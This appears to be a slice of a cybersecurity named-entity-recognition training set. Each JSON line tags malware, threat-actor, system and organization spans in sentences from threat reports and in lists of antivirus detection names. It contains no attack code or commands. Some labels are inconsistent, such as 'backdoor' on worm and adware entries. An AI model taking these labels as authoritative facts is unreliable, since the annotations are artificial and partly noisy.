{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9786 TROJ_ONKODS.SMFF Trojan.DownLoader13.29927 TROJ_ONKODS.SMFF TrojanDownloader:Win32/Cerber.A Trojan.Zbot.188 Trojan/Win32.Fakeavlock.R144660 Trojan-Downloader.Win32.Tiny", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001818", "source": "cyner2_train"}}
{"text": "These solutions are typical in enterprise environments.", "spans": {"SYSTEM: enterprise environments.": [[31, 55]]}, "info": {"id": "cyner2_train_001819", "source": "cyner2_train"}}
{"text": "The ransomware is designed to infect Microsoft Windows computers.", "spans": {"MALWARE: ransomware": [[4, 14]], "SYSTEM: Microsoft Windows computers.": [[37, 65]]}, "info": {"id": "cyner2_train_001821", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Delf.NGA Worm.Win32.Delf!O Worm.Delf Win32.Worm.Delf.NGA Win32.Worm.Delf.bd W32/Trojan2.MIZZ W32.Screentief Win32/Screentief.A WORM_AUTORUN.GKP Worm.Win32.Delf.vn Win32.Worm.Delf.NGA Win32.Worm.Delf.clov Win32.Worm.Delf.NGA TrojWare.Win32.PSW.OnLineGames.~LDK Win32.Worm.Delf.NGA Trojan.DownLoader4.55571 WORM_AUTORUN.GKP W32/Trojan.DZCT-6244 Worm:Win32/Screenthif.A Worm/Win32.Delf Worm:Win32/ScreenThif.A Win32.Worm.Delf.NGA Trojan.Win32.Scar.702464 Worm.Win32.Delf.vn Win32.Worm.Delf.NGA HEUR/Fakon.mwf Win32.Delf Win32/Delf.NQC W32/Delf.NQC!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001822", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DontovoF.Trojan Trojan.Hacktool.Httptunnel.A Trojan/W32.HackTool.36864.I Trojan.Hacktool.Httptunnel.A Tool.HTTPTunnel.Win32.1 Trojan/Hacktool.HTTPTunnel Trojan.Hacktool.Httptunnel.A Trojan.Hacktool.Httptunnel.A W32/Tool.UFFD-0015 TROJ_HTTPTUNE.A Trojan.Hacktool.Httptunnel.A HackTool.Win32.HTTPTunnel Riskware.Win32.HTTPTunnel.hskj HackTool.W32.HTTPTunnel!c Trojan.Hacktool.Httptunnel.A Application.Win32.HackTool.HTTPTunnel BehavesLike.Win32.PUP.nz W32/HackTool.EG Hacktool.HttpTunnel W32.Hack.Tool HackTool/Win32.HTTPTunnel HackTool.Win32.HTTPTunnel Win32/HackTool.HTTPTunnel Win32.Hacktool.Httptunnel.Ljul", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001824", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.KGEI-2537 Trojan-Spy.Win32.Alinaos.as Trojan.Win32.Z.Zusy.575488.M BehavesLike.Win32.Trojan.hc Trojan.MSIL.Krypt Trojan.Zusy.D3371D Trojan/Win32.Inject.C1647442 Trojan-Spy.Win32.Alinaos.as Trojan:MSIL/Proseus.A!bit Trj/CI.A Msil.Trojan.Dropper.Sxdx Win32/Trojan.Dropper.6f6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001826", "source": "cyner2_train"}}
{"text": "These attacks caused significant financial impact for major cryptocurrency markets, with one cryptocurrency cloud provider losing over $12 million in assets, allegedly to ITG03.", "spans": {"ORGANIZATION: cryptocurrency markets,": [[60, 83]], "ORGANIZATION: cryptocurrency cloud provider": [[93, 122]], "THREAT_ACTOR: ITG03.": [[171, 177]]}, "info": {"id": "cyner2_train_001828", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Delf!O Worm.Zorin W32.Looked.P Win32/Looked.C PE_LEOX.A Worm.Win32.Zorin.a Trojan.Win32.Zorin.wmfe W32.W.Viking.l3Va Virus.Win32.Zorin.a Win32.HLLW.Looked Virus.Delf.Win32.16 PE_LEOX.A BehavesLike.Win32.Backdoor.lh Worm.Win32.Viking W32/Zorin.A Worm/Zorin.a Virus/Win32.Delf.dpee Worm.Logo.f.67072 Worm:Win32/Zorin.A Worm.Win32.A.Zorin.67072 Worm.Win32.Zorin.a Win32/Zorin.67072 Trojan.Delf.62976 Win32/Viking.NAI Worm.Zorin.A W32/Zorin.A.worm Win32/Worm.Zorin.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001829", "source": "cyner2_train"}}
{"text": "The focus of the Android banking malware in Google Play is different from any other Android malware we have investigated.", "spans": {"MALWARE: Android banking malware": [[17, 40]], "SYSTEM: Google Play": [[44, 55]], "MALWARE: Android malware": [[84, 99]]}, "info": {"id": "cyner2_train_001830", "source": "cyner2_train"}}
{"text": "Actually, this is not the first ransomware to come out of Brazil.", "spans": {"MALWARE: ransomware": [[32, 42]]}, "info": {"id": "cyner2_train_001832", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.12356.C TrojanPSW.OnLineGames.gyv Trojan.DL.Hover!hoKEWysDbsk W32/Packed_Upack.A Trojan.Onlinegames-2021 Trojan-Downloader.Win32.Hover.ae Heur.Packed.Unknown Trojan.AVKill.425 TR/CHover.AE Trojan/PSW.OnLineGames.aogk TrojanDownloader:Win32/Idicaf.C Win-Trojan/OnlineGameHack.12356.D Trojan-PSW.Win32.OnLineGames.alse HeurEngine.ZeroDayThreat W32/OnLineGames.ALSE!tr.pws PSW.OnlineGames.ATXK Trj/Lineage.KMQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001833", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Nsis.hgnwk TROJ_SPNR.07JB11 Trj/CI.A Win32.Troj.DeepScan.x.kcloud Trojan:Win32/Sinis.C W32/Bfr.CV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001834", "source": "cyner2_train"}}
{"text": "Unit 42 has uncovered a new campaign from the CozyDuke threat actors, aka CozyCar leveraging malware that appears to be related to the Seaduke malware described earlier this week by Symantec.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: campaign": [[28, 36]], "THREAT_ACTOR: CozyDuke threat": [[46, 61]], "THREAT_ACTOR: CozyCar": [[74, 81]], "MALWARE: malware": [[93, 100]], "MALWARE: Seaduke malware": [[135, 150]], "ORGANIZATION: Symantec.": [[182, 191]]}, "info": {"id": "cyner2_train_001835", "source": "cyner2_train"}}
{"text": "It leaves a ransom note with the following filename: !!! how to decrypt files !!!.txt", "spans": {"MALWARE: ransom": [[12, 18]]}, "info": {"id": "cyner2_train_001837", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Mutant.32128 TrojanDownloader.Mutant.aim Trojan.DR.Wigon.K Win32/Wigon.CK W32/Trojan3.GG Trojan.Pandex W32/DLoader.JDXM Trojan.Downloader-55828 Trojan-Downloader.Win32.Mutant.aim Trojan.Downloader.Wigon.A TrojWare.Win32.Wigon.CK Trojan-Downloader.Win32.Mutant.aim Trojan.Rntm.10 Win32/Wigon.CK W32/Trojan3.GG TrojanDropper:Win32/Cutwail.AG Trojan.Downloader.Wigon.A Trojan.Pandex.ILG Trojan.Win32.Undef.qqp Trojan-Dropper.Cutwail BackDoor.Ntrootkit Trj/BedeTres.R", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001838", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Trojan.Spy.Delf.PY Backdoor.Win32.Swz!O Backdoor/Swz.c Trojan.Spy.Delf.PY Win32.Trojan.WisdomEyes.16070401.9500.9990 W32/Trojan.XFMU-4902 TSPY_DELF.EGM Win.Spyware.3595-2 Backdoor.Win32.Swz.c Dropped:Trojan.Spy.Delf.PY Trojan.Win32.Swz.bcbdrt Dropped:Trojan.Spy.Delf.PY TrojWare.Win32.Dialer.LA Dropped:Trojan.Spy.Delf.PY Trojan.DownLoader.18593 TSPY_DELF.EGM BehavesLike.Win32.HLLP.dh Trojan-Dropper.Delf W32/Trojan.YLD Backdoor/Delf.sn Trojan[Backdoor]/Win32.Swz Backdoor.Win32.Hupigon.159240 Backdoor.Win32.Swz.c Dropped:Trojan.Spy.Delf.PY Trojan/Win32.Llac.R36500 Dropped:Trojan.Spy.Delf.PY Backdoor.Win32.Hupigon.axbc TrojanSpy.Delf!ehn0gq0J77k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001840", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9955 BKDR_ZEGOST.SM17 Trojan.Win32.FBOK.exmdmr TR/Crypt.Xpack.drajw Trojan.Johnnie.D15B42 Trojan:Win32/Redosdru.AB Trj/GdSda.A Win32/Backdoor.d55", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001841", "source": "cyner2_train"}}
{"text": "A Mumblehard infected server opens a backdoor for the cybercriminals that allows them full control of the system by running arbitrary code.", "spans": {"MALWARE: Mumblehard": [[2, 12]], "THREAT_ACTOR: cybercriminals": [[54, 68]], "VULNERABILITY: arbitrary code.": [[124, 139]]}, "info": {"id": "cyner2_train_001842", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Skeeyah Worm.EternalRocks Win32.Trojan.WisdomEyes.16070401.9500.9972 W32.Eternalrocks Win.Trojan.EternalRocks-6320096-0 Worm.EternalRocks.t Trojan/Win32.Fsysna Trojan:Win32/Eterock.A Win-Trojan/MDA.630F094C Trojan.Fsysna Worm.DoomsDay W32/Eterocks.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001844", "source": "cyner2_train"}}
{"text": "In addition to the commoditized EKs, this exploit code has been leveraged in numerous one-shot and gated web-exploitation campaigns, delivered through a mix of the usual malvertising networks and compromised websites.", "spans": {"MALWARE: EKs,": [[32, 36]], "THREAT_ACTOR: gated web-exploitation campaigns,": [[99, 132]]}, "info": {"id": "cyner2_train_001846", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Skeeyah.8391 Trojan.Win32.Drop.bbwlfj Trojan.MulDrop4.627 TR/MiniMal.A.120 Trojan.Graftor.D4750 W32/Redosdru.BED!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001847", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Tinyloader Trojan.Zusy.D258DB Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Tiny.dztpub Trojan.Win32.Tiny TrojanDownloader:Win32/Tinyloader.D Trj/CI.A Win32.Trojan.Crypt.Wrqf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001849", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Orbus.S11689 Trojan.Zusy.DE453 W32/Trojan2.OGNI Backdoor.Salgorea Win32/Tnega.WCBBKMB TROJ_CUEGOE.SM Win.Trojan.Cuegoe-6336261-0 Application.Win32.Amonetize.NE TROJ_CUEGOE.SM W32/Trojan.WOEU-3966 TR/Zusy.htd.1 Trojan.Dropper Trojan.Zusy!G5SenpWt4dI W32/Salgorea.C!tr Backdoor.Win32.OceanLotus.X", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001850", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.AutoIt.Zbot.S Win32.Trojan.WisdomEyes.16070401.9500.9823 W32/Trojan.FKJB-3819 Trojan.Win32.Autoit.abnef BehavesLike.Win32.Dropper.bh DR/Autoit.dhgia TrojanDownloader:VBS/Banload.BEP Trojan.Win32.Autoit.abnef Trj/CI.A W32/Injector.DMUI!tr Win32/Trojan.3cd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001851", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MSIL.Trojan.Injector.q TrojWare.MSIL.Injector.AB Trojan.Starter.4871 BehavesLike.Win32.Ransomware.ch W32/Trojan.QQTT-3117 Trojan:MSIL/Ranos.A Trojan.Msil Win32/Trojan.ead", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001852", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D1BC52 Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Memsyl Trojan.Win32.Inject1.dkmaoo Trojan.Inject1.45689 Trojan.Injector.Win32.256336 Trojan.MSIL.Inject Trojan[Dropper]/Win32.Injector Dropper/Win32.Necurs.R121870 Trojan.JobLaunch.ODB Trj/CI.A Trojan.Injector!pUXRB6SMd/g", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001853", "source": "cyner2_train"}}
{"text": "Alibaba researchers then posted an analysis report on the malware, giving it the name XcodeGhost.", "spans": {"ORGANIZATION: Alibaba researchers": [[0, 19]], "MALWARE: malware,": [[58, 66]], "MALWARE: XcodeGhost.": [[86, 97]]}, "info": {"id": "cyner2_train_001854", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Bayrob.c W32/Trojan.RXRB-1881 Trojan.Win32.Dwn.eeedhz Trojan.Win32.Z.Bayrob.1075712.R Trojan.DownLoader22.1800 BehavesLike.Win32.Trojan.tc TR/Nivdort.knzgo Trojan:Win32/Nivdort.A Trojan.Kazy.DC0934 Trojan/Win32.Nivdort.C1321145 Trojan.Win32.Bayrob W32/Bayrob.BL!tr Win32/Trojan.f19", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001855", "source": "cyner2_train"}}
{"text": "FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261, and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege EOP zero-day CVE-2017-0263.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: two actors": [[22, 32]], "THREAT_ACTOR: Turla": [[35, 40]], "THREAT_ACTOR: unknown financially motivated actor": [[48, 83]], "VULNERABILITY: EPS zero-day": [[107, 119], [166, 178]], "THREAT_ACTOR: APT28": [[139, 144]], "VULNERABILITY: Escalation of Privilege EOP zero-day": [[210, 246]]}, "info": {"id": "cyner2_train_001856", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9946 Trojan.Win32.Shifu.aoc Packed.Win32.TDSS.~AA Packed:W32/PeCan.A FDOS.Chalcol BehavesLike.Win32.Virut.cc Dos.Chalcol.a DoS:Win32/Chalcol.A Trojan.Win32.Shifu.aoc DoS.Chalcol Win32/DoS.Chalcol.A Win32.Trojan.Chalcol.Wpsv DoS.Win32.Chalcol Win32/Trojan.DoS.0cc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001859", "source": "cyner2_train"}}
{"text": "This vulnerability allows an attacker to escape the Internet Explorer sandbox with a VBScript script and execute an arbitrary binary file downloaded from the Internet.", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "SYSTEM: Internet Explorer sandbox": [[52, 77]], "MALWARE: arbitrary binary file": [[116, 137]]}, "info": {"id": "cyner2_train_001866", "source": "cyner2_train"}}
{"text": "Since first writing about the discovery of HDDCryptor back in September, we have been tracking this ransomware closely as it has evolved.", "spans": {"MALWARE: HDDCryptor": [[43, 53]], "MALWARE: ransomware": [[100, 110]]}, "info": {"id": "cyner2_train_001867", "source": "cyner2_train"}}
{"text": "While there are many distinct malware families that scrape unencrypted process memory to obtain cards, some of these malware capabilities overlap with generic information stealing trojans such as Flokibot that obtain and exfiltrate HTTPS GET and POST data and other materials from compromised machines.", "spans": {"MALWARE: malware families": [[30, 46]], "VULNERABILITY: unencrypted process memory": [[59, 85]], "MALWARE: malware": [[117, 124]], "MALWARE: trojans": [[180, 187]], "MALWARE: Flokibot": [[196, 204]], "SYSTEM: compromised machines.": [[281, 302]]}, "info": {"id": "cyner2_train_001870", "source": "cyner2_train"}}
{"text": "Magnitude EK is notorious for distributing the Cerber ransomware specifically to certain geolocations, and in particular South Korea, via its own gate, called Magnigate.", "spans": {"MALWARE: Magnitude EK": [[0, 12]], "MALWARE: the Cerber ransomware": [[43, 64]], "ORGANIZATION: Magnigate.": [[159, 169]]}, "info": {"id": "cyner2_train_001871", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Bepush.H3 Dropper.Dapato.Win32.26115 Win32.Trojan.WisdomEyes.16070401.9500.9850 TROJ_BEPUSH_EK040412.UVPM Trojan.Win32.Dapato.dzszpp Trojan.Win32.Z.Bepush.943616.C Trojan.DownLoader14.14903 TROJ_BEPUSH_EK040412.UVPM BehavesLike.Win32.Backdoor.dh Trojan.Win32.Bepush TR/Dropper.A.7849 MSIL/Dropper.UTIT!tr Trojan[Dropper]/Win32.Dapato Trojan.Zusy.D262FF Trojan:MSIL/Bepush.H TrojanDropper.Dapato Win32.Trojan-dropper.Dapato.Hsik Trojan.DR.Dapato!MYHy5uvhZGg Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001875", "source": "cyner2_train"}}
{"text": "Talos first analyzed this threat in our 2020 blog post, highlighting its large repertoire of modules, multiple methods of spreading, and continuous development.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "MALWARE: threat": [[26, 32]], "MALWARE: repertoire of modules,": [[79, 101]]}, "info": {"id": "cyner2_train_001876", "source": "cyner2_train"}}
{"text": "In this situation, the threat actors decided to take advantage of this behavior by using Search Engine Optimization SEO to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus Panda banking Trojan.", "spans": {"THREAT_ACTOR: the threat actors": [[19, 36]], "SYSTEM: Search Engine Optimization SEO": [[89, 119]], "ORGANIZATION: users": [[212, 217]], "MALWARE: the Zeus Panda banking Trojan.": [[223, 253]]}, "info": {"id": "cyner2_train_001878", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9976 Trojan.Farfli Win32/Covesmer.AT TROJ_FARFLI.XM Html.Trojan.RootkitVimponey-1 TrojanDownloader:Win32/Vimponey.A Trojan.Win32.Downloader.56320.BV Trojan.NtRootKit.2772 TROJ_FARFLI.XM Trojan.Graftor.D2B9F3 TScope.Malware-Cryptor.SB Win32/Trojan.d21", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001879", "source": "cyner2_train"}}
{"text": "In the end, I bring considerations and reflections on OTP Tokens effectiveness as a second factor authentication solution.", "spans": {}, "info": {"id": "cyner2_train_001880", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.Interlac.1.0.B Trojan-Dropper.Win32.Interlac.10!O TrojanDropper.Interlac Dropper.Interlac.Win32.61 Trojan/Dropper.Interlac.10.b TROJ_INTERLAC.B W32/Trojan.PMPA-6139 Win32/Interlaced.10.B Win.Dropper.Delf-619 Backdoor.Bifrose Backdoor.Win32.Bifrose.te Trojan.Dropper.Interlac.1.0.B Trojan.Win32.Delf.hitv Backdoor.Win32.Bifrose.23040.R TrojWare.Win32.TrojanDropper.Interlac.B Trojan.KillFiles Trojan-Dropper.Win32.Interlac.B W32/Trojan.FIF TrojanDropper.Interlac.10.b TR/Drop.Inte.10.b.3 Trojan[Backdoor]/MSIL.Bladabindi.as TrojanDropper:Win32/Interlac.B Trojan.Dropper.Interlac.1.0.B Backdoor.Win32.Bifrose.te Trojan.Dropper.Interlac.1.0.B Trojan/Win32.KillFiles.C37985 Trojan.Dropper.Interlac.1.0.B Trojan.Dropper.Interlac.1.0.B Trj/Interlac.A Win32/TrojanDropper.Interlac.10.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001883", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Rycii.Worm Worm/W32.Nency.229376 Worm.Win32.VB!O Worm.VB.Win32.295 Trojan.Heur.EE8D5F Win32.Trojan.WisdomEyes.16070401.9500.9987 Win32/Shur.A WORM_VB.FNX Worm.Win32.VB.cj Trojan.Win32.VB.ntmf Worm.Win32.VB.229376.D Worm.Win32.VB.~FF Win32.HLLW.Brontok WORM_VB.FNX BehavesLike.Win32.Vilsel.dm Worm.Win32.VB Worm/VB.ca WORM/Bugus.A Worm/Win32.VB.cj Worm.VB.cj.kcloud Trojan:Win32/Brontok.A Worm.Win32.VB.cj Trojan.VBRA.08344 I-Worm.VB.CJ Win32.Worm.Vb.Pkhb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001885", "source": "cyner2_train"}}
{"text": "Changes include an increase in the quantity of injection varieties, as well as payloads deviating from the standard SocGholish Fake Update JavaScript packages.", "spans": {"MALWARE: payloads": [[79, 87]], "MALWARE: the standard SocGholish Fake Update JavaScript packages.": [[103, 159]]}, "info": {"id": "cyner2_train_001886", "source": "cyner2_train"}}
{"text": "In addition we were also able to resolve the hosting IP 212.192.14.3 as well as the ASN AS39144 located in the United Kingdom to all registered domains.", "spans": {}, "info": {"id": "cyner2_train_001887", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9526 Win.Worm.VB-698 BehavesLike.Win32.Autorun.dt W32.W.Otwycal.l4av Win32/RiskWare.PEMalform.E Trojan-Banker.Win32.Bancos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001888", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Opanki.worm Backdoor.SDBot W32.W.Pakes!c Win32.Trojan.WisdomEyes.16070401.9500.9915 W32/Opanki.AY Backdoor.Sdbot Win.Trojan.Pakes-927 Backdoor.Win32.IRCBot.cq Trojan.Win32.Pakes.flbf Worm.Win32.IM-Pakes.150528 Worm.Win32.Oscarbot.BL BackDoor.IRC.Sdbot.170 Worm.Pakes.Win32.1 BehavesLike.Win32.Sdbot.cc W32/Opanki.NEXW-4186 Backdoor/IRCBot.etu WORM/Pakes.A Worm.Pakes.kcloud Backdoor.Win32.IRCBot.cq Worm/Win32.IRCBot.C2420 SScope.Backdoor.Sdbot Backdoor.SDBot Trj/Pakes.EB Win32/Oscarbot.BL Win32.Worm-im.Pakes.Aexo Worm.IRCBot!NcS/fGqoMio Backdoor.Win32.Aimbot W32/Opanki!worm.im", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001889", "source": "cyner2_train"}}
{"text": "At the time of that discovery, the latest versions we had seen were 1.5.x, months before.", "spans": {}, "info": {"id": "cyner2_train_001890", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/PSW.Sagic.15.d Win32/PSW.Sagic.15.D W32/Packed_Mew.C TSPY_SAGIC.X Win32.Stration Trojan.Spy-6657 TrojWare.Win32.PSW.Sagic.D Trojan.DownLoader.5739 TR/PSW.Sagic.F Win32/Sagic.F PWS:Win32/Sagic.F Trojan.PSW.Sagic.15.e W32/Sagic.D!tr.pws Trj/Sagic.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001892", "source": "cyner2_train"}}
{"text": "This is the first time that we have seen Cerber distributed via the use of WSFs.", "spans": {"MALWARE: Cerber": [[41, 47]]}, "info": {"id": "cyner2_train_001894", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Goicu.A BackDoor-ANF.cli BKDR_NETTROJAN.A BKDR_NETTROJAN.A Win.Trojan.Nettrojan-1 Backdoor.Goicu.A Backdoor.Win32.NetTrojan Backdoor.Goicu.A Trojan.Win32.NetTrojan.bhgtue Backdoor.Win32.NetTrojan.518144 Backdoor.W32.NetTroj!c Backdoor.Goicu.A Backdoor.Win32.DNetTrojan.A Backdoor.Goicu.A Backdoor.NetTrojan.Win32.4 BackDoor-ANF.cli W32/Risk.VTVG-6810 Trojan/NetTrojan.c BDC/NetTrojan.Cli Trojan[Backdoor]/Win32.NetTrojan Backdoor.Goicu.A Backdoor.Win32.NetTrojan Backdoor.Goicu.A Win32/DNetTrojan.A Win32.Backdoor.Nettrojan.Tcmd Backdoor.ANF.A W32/BDoor.NetTrojan!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001895", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D36A22 Win32.Trojan.WisdomEyes.16070401.9500.9942 Backdoor:MSIL/Draliz.A Trj/GdSda.A PUA.MSIL.NetSeal", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001896", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.KotispaLTL.Trojan Trojan/Glupteba.ao W32/Trojan2.PAMI HT_GLUPTEBA_GA310456.UVPM Win32.Trojan-Downloader.Glupteba.A Trojan.Win32.Glupteba.egxnjb Trojan.Glupteba.Win32.3453 HT_GLUPTEBA_GA310456.UVPM W32/Trojan.NEJE-6779 TrojanProxy.Glupteba.vg TR/ATRAPS.hbngn Trojan[Proxy]/Win32.Glupteba Trojan.Zusy.D33746 Trojan/Win32.Glupteba.C1592487 TrojanProxy.Glupteba Trj/GdSda.A Trojan.PR.Glupteba! Trojan.Win32.Glupteba W32/Glupteba.AO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001897", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sabresac.A5 Adware.Elex Trojan.Sabres.Win32.1 Troj.W32.Excalibur.tnrv Trojan/Sabresac.a Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Sabres.h TrojWare.Win32.Excalibur.A BehavesLike.Win32.Adware.fm Adware.Elex/Variant Trojan.Win32.Sabres.h Trojan.Excalibur Trj/GdSda.A Trojan.Zusy.D2E5F4 Win32.Trojan.Sabres.Aenw Trojan.Win32.Sabresac Win32/Trojan.6a0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001898", "source": "cyner2_train"}}
{"text": "As the development phase supposedly ended, malware started spreading from India, the United States and Israel to other countries around the globe.", "spans": {"MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_001899", "source": "cyner2_train"}}
{"text": "In recent years, the AgentTesla secret-stealing Trojan has continued to be active, and Antiy CERT has repeatedly monitored attacks targeting domestic government, enterprise institutions, and colleges and universities to deliver this secret-stealing Trojan.", "spans": {"MALWARE: the AgentTesla secret-stealing Trojan": [[17, 54]], "ORGANIZATION: Antiy CERT": [[87, 97]], "ORGANIZATION: domestic government, enterprise institutions,": [[141, 186]], "ORGANIZATION: colleges": [[191, 199]], "ORGANIZATION: universities": [[204, 216]], "MALWARE: secret-stealing Trojan.": [[233, 256]]}, "info": {"id": "cyner2_train_001900", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1938 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.Q Win.Trojan.Virut-377 Virus.Win32.Virut.q Virus.Win32.Virut.hpeg W32.Virut.l5he Virus.Win32.Virut.Ce Win32.Virut.5 PE_VIRUX.Q Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus:Win32/Virut.BN Virus.Win32.Virut.q Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.DsBot W32/Virut.CE W32/Sality.AO Win32/Virus.VirutChangeEntry.H", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001902", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MspassHDK.Trojan Abuse-Worry/W32.Messen.64000 PSWTool.Win32.Messen!O Trojan.Passviewc Win32.Trojan.WisdomEyes.16070401.9500.9571 W32/Trojan.RJEU-3073 not-a-virus:HEUR:PSWTool.Win32.PassView.c Riskware.Win32.Messen.wcor Trojan.Inject1.34913 Tool.Messen.Win32.113 W32/Trojan2.GXAC TrojanDropper.Injector.bilf Trojan[PSWTool]/Win32.Messen Application.Heur.ED65B4 Trojan.Win32.PSWIMMultiPass.61996 not-a-virus:HEUR:PSWTool.Win32.PassView.c Unwanted/Win32.Messenpass.R46038 PUP.Optional.MessenPass Riskware.PSWTool! Win32/Application.BO.08a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001903", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLT031012KGHN.Worm Worm.Win32.AutoRun!O Trojan.Finodes.BB5 W32/Autorun.worm.ht Worm.AutoRun Worm.AutoRun.Win32.46218 Trojan.Strictor.DEE4 W32.SillyFDC Win.Worm.Autorun-10000 Worm.Win32.AutoRun.cxps Trojan.Win32.AutoRun.rfaml Worm.Win32.A.AutoRun.117760.W Trojan.Win32.FakeFolder.bbc Win32.HLLW.Autoruner1.889 BehavesLike.Win32.PWSZbot.dz Worm/AutoRun.ahpl TR/Finodes.B.406 Worm/Win32.AutoRun Trojan:Win32/Finodes.B Worm.Win32.AutoRun.cxps Worm/Win32.AutoRun.R22156 Worm.AutoRun Trojan.Zusy Worm.AutoRun!7DcK6jk8E7A Worm.Win32.AutoRun W32/Autorun.CXP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001906", "source": "cyner2_train"}}
